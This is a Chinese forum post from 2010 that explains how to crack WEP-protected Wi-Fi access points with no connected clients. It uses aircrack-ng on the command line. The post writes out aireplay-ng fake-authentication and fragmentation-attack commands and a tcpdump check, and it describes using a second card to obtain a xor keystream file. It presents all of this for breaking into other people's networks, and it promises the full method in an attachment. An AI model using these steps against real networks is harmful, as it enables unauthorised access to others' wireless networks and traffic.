上校
- 注册时间
- 2011-5-17
- 金币
- 13173 个
- 威望
- 0 个
- 荣誉
- 0 个
累计签到:1080 天
连续签到:0 天
[LV.1095]铁杆粉丝
|
无客户端P解,命令行下成功率最高!
客户端, 成功率, 命令
本帖最后由 穿山甲 于 2010-1-15 12:46 编辑
下载 (19.83 KB)
2010-1-15 12:34
无客户端P解,还是命令行下成功率最高
近期研究卡H,真是个好东西,不过遇到好多都没有客户端在线,也没有数据流动,用spoonwep2难以P解,经过在本站不断学习,觉得命令行下P解成功率高得多,现把2个关键环节说明如下,倾听大家的意见:
一是“虚连接”必须要成功
用自己的网卡与AP建立“虚连接”
aireplay-ng -1 0 -e AP的essid -a AP的mac -h 自己网卡的mac wlan0
这时,系统将回显
Sending Authentication Request
Authentication successful
Sending Association Request
Association successful:-) (aid:1)
然后用下面的命令来检查是否已经连接到AP上
tcpdump –n –e –s0 –vvv –i wlan0
成功:则不停闪出数据,按Crtl+C 终止Tcpdump进程,会在最后三行看到以下数据显示:
XXX packets captured
XXX packets recerved by filter
XXX packets dropped by kernel
不成功:如果没有连接成功,AP会告诉你未连接,这样AP会忽略来自网卡的注入包,P解不会成功!
二是必须用另一张卡H来“假连接”,以获得至关重要的一个xor文件
如果上面的虚连接成功,就执行下面假连接
aireplay-ng -5 -b ap的mac -h 自己网卡的mac rausb0
然后用另一个卡H,随便输入10位密码,“假连接”AP ,来获得xor文件
如果一切顺利,系统将回显
Use this packet ?
y 回车,将得到一个至关重要的xor文件。
再输入ls 查看当前目录,你将看到刚才生成的一个后缀名为xor 的文件。
其它的P解方法都跟网上的差不多!
完整的方法在附件中,请回复下载! |
|
[复制链接]
IP卡
狗仔卡
发表于 2011-5-21 19:23
显身卡
